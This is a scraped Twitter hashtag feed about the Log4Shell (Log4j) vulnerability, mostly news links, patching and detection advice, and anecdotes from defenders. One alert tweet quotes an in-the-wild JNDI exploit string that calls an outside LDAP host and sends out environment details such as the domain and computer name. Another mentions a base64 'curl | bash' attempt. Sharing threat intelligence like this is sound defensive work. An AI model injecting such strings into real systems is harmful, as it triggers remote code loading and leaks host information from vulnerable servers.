-
A DFIR friend told me that one of his customers, which spent a full week finding & remediating log4j vulnerabilities got ransomed through an unpatched Confluence vulnerability that was published in August
#Log4j#Log4Shell pic.twitter.com/ATINukuFCz -
If you have LDAP servers inside your network, or trust external 3rd-party ones, and either of them allow the schema attributes javaClassName, javaCodeBase or javaSerializedObject as writable, you should be making sure attackers aren't using them for
#Log4j#Log4Shell pic.twitter.com/hDAPLJq7qIहा थ्रेड दाखवा -
New Alert Ongoing distributed scanning targeting
#VMware instances vulnerable to#Log4Shell (2nd round) ${jndi:ldap://149.28.240.17:443/3927f9a2a513d2b1c4da803f15e6de48_:;_${env:USERDOMAIN}_:;_${env:COMPUTERNAME}_:;_${java:os}_:;_${sys:java.version}} Domain recon pic.twitter.com/AdxRnNAs32हा थ्रेड दाखवा -
v6.0 of the "Am I vulnerable to
#Log4Shell decision tree. Also pushed the XML files on my github : https://github.com/DickReverse/InfosecMindmaps/tree/main/Log4shell … Don't hesitate to interact and propose updates. pic.twitter.com/Rwv67NNkxHहा थ्रेड दाखवा -
Le type de tentative d'exploitation que je reçois dans mes journaux
#nginx. Le#base64 décodé fait du curl | bash, bref un classique... ip bloquée, protégez vous (mettez-à jour)#Log4Shell pic.twitter.com/uRd6ttHqbv -
We are just a quick second away from abrupt chaos until all the
#Log4Shell#Log4j systems are patched.pic.twitter.com/pxfwYCDekG -
When relying on open source tools for detection of vulnerable
#Log4j components: 1. Make sure you use the most up to date version of the tool 2. Be mindful of the fact that not all edge cases are covered More on that here: https://www.zdnet.com/article/multiple-log4j-scanners-released-by-cisa-crowdstrike-more/ …#Log4Shell pic.twitter.com/ChNVmn58jR -
Well everyone, I'm finally out of Omicron quarantine. Studio was shut down for weeks. Anyway, hope you had a lovely Christmas!
#Log4Shell#log4j#sysadminpic.twitter.com/mIMO1xawN0 -
-
-
Busca IPs de
#Log4Shell en tu red https://j.mp/30XnVtB pic.twitter.com/6Fg3zCyebM -
MàJ schéma log4j pour Java 6 ! http://secu.si/2021/12/log4shell/ … CVE-2021-44228
#Log4Shell#ApacheLog4j#log4j2pic.twitter.com/ObkK7bOu6c -
#Log4Shell es una librería vulnerable de Apache, una ventana abierta de forma permanente a la#ciberdelincuencia. https://buff.ly/3pDSeih pic.twitter.com/qqBPZ9LH0C -
La faille
#Log4Shell inquiète les experts de la#cybersécurité. Cette dernière touche un module de code en accès libre, utilisé dans nombre de logiciels.@CybelAngel explique https://bit.ly/Log4Shell-les-dangers-de-la-faille …. – à lire sur@ByMaddyness.#log4j#Log4Shell#secops#CISOpic.twitter.com/FDKovLKa8c -
@CERT_FR revient sur les vulnérabilités significatives de la semaine, et#Log4Shell n'est pas tout seul. https://www.cert.ssi.gouv.fr/actualite/CERTFR-2021-ACT-053/ …pic.twitter.com/J7XW8WyBv6
लोड करण्या करता काही वेळ लागू शकतो.
Twitter वरची क्षमता ओलांडली गेली आहे किंवा तात्पुरती अडचण अनुभवास येत आहे. पुन्हा प्रयत्न करा किंवा अधिक माहितीसाठी Twitter स्थिती येथे भेट द्या.